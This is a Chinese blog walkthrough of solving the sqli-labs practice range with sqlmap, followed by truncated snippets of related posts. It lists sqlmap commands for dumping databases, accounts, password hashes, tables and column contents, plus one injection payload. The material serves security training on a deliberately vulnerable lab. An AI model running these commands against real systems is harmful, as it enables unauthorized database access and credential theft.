今天我們來用sqlmap去做sqli-labs靶場
首先來講一下基礎命令
1.清除sqlmap快取:
第乙個辦法:在c:\users\dragoneyes.sqlmap\output,刪除output裡面的內容
第二個辦法:sqlmap.py --purge
2.sqlmap -u 注入點 檢測注入點是否可用
sqlmap -u 注入點 –batch 自動輸入
暴庫sqlmap -u 注入點 –dbs //暴庫
web當前使用的資料庫
sqlmap -u 注入點 –current-db //爆當前使用的庫
web資料庫使用的賬戶
sqlmap -u 注入點 –current-user //當前使用的賬戶
列出sqlserver所有使用者
sqlmap -u 注入點 –users // 列出所有使用過的賬戶
資料庫賬戶與密碼
sqlmap -u 注入點 –passwords //mysql的登入賬戶和密碼
列出資料庫中的表
sqlmap -u 注入點 -d 指定資料庫名 –tables //(-d指定資料庫名稱)
列出表中字段
sqlmap -u 注入點 -d 指定資料庫名 -t 指定的表名 –columns
爆欄位內容
sqlmap -u 注入點 -d 指定資料庫名 -t 指定表名 -c 「email,username,userpassword」 –dump (將結果匯出)
–risk:風險等級,共有4個,預設是1會測試大部分的測試語句,2會增加基於事件的測試語句,3會增加or語句的sql注入測試。
level:共有五個等級,預設為1,在你不確定哪個payload或者引數為注入點的時候,為了保證全面性,建議使用高的level值。
第一關
先準備sqlmap
找到注入的,進行最高等級的爆庫,很順利
找到資料庫型別和確定有注入點可利用
全部資料庫也爆出來了
檢視我們現在所在的資料庫 --current-db
然後我們檢視資料庫中的表–table
users表中應該有我們想要的,獲取字段–col
顯示我們想要的字段 --dump
拿下資料庫
第二關刪除上次的快取 --purge
和第一關一模一樣,
sqlmap.py -u ""
--leve=
5--risk=
3--dbs
第三關
一模一樣,沒難度
第四關一模一樣
工具用的
id=1") and 2038=2039 and (「vlst」="vlst
第5關一般的不行
跑到這裡點yes就行了
第六關和第5關一模一樣
第七關一模一樣
第八關一模一樣
第九關一樣
第十關一樣
總結一句sqlmapnb
Sqli labs 學習筆記
資料庫的連線函式 concat和concat ws concat ws的第乙個引數是連線字串的分隔符。user 返回當前資料庫連線使用的使用者 database 返回當前資料庫連線使用的資料庫 version 返回當前資料庫的版本 127.0.0.1 sqli labs less 1 id 1 un...
Sqli labs 部落格目錄
之前學習了一遍 sqli labs,這是鞏固複習一遍,全部手敲,加深印象 sqli labs 部落格目錄 sqli labs less01 04 基於錯誤的sql注入 get sqli labs less05 06 報錯型sql盲注 get sqli labs less07 輸出到檔案 get sq...
sqli labs環境搭建
安裝完成後介面如下。4 配置資料庫 開啟d phpstudy pro www sqli labs master sql connections db creds.inc 把密碼設定為root 5 修改phpstudy版本為5版本,否則執行sqli labs出現很多報錯。6 開啟sqli labs首頁...